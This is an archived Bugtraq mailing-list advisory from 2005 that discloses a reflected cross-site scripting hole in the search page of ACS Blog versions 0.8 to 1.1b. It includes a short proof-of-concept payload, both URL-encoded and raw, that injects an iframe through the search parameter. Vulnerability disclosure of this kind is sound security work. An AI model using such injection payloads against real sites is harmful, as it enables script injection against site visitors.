[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

XSS in ACS blog

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XSS in ACS blog
From: farhad koosha <farhadkey@xxxxxxxxx>
Date: 17 Mar 2005 08:24:01 -0000


XSS vulnerability exist in the ACS blog ( ASP WEBLOG SYSTEM ).

Vulnerable :

ACS Blog v 0.8
ACS Blog v 0.9
ACS Blog v 1.0
ACS Blog v 1.1b

Code :

/search.asp?search=%22%3Cbr%3E%3Ciframe+src%3D%22http%3A%2F%2Fgoogle.com%22%3E%3C%2Fiframe%3E

or goto /search.asp and copy this code :
"<br><iframe src="http://google.com";></iframe>

Vendor URL : http://www.asppress.com

Prev by Date: Windows 2000 GDI32.DLL GetEnhMetaFilePaletteEntries() API specially crafted EMF file DOS vulnerability
Next by Date: PHP mcNews arbitrary file inclusion
Previous by thread: Windows 2000 GDI32.DLL GetEnhMetaFilePaletteEntries() API specially crafted EMF file DOS vulnerability
Next by thread: PHP mcNews arbitrary file inclusion
Index(es):
- Date
- Thread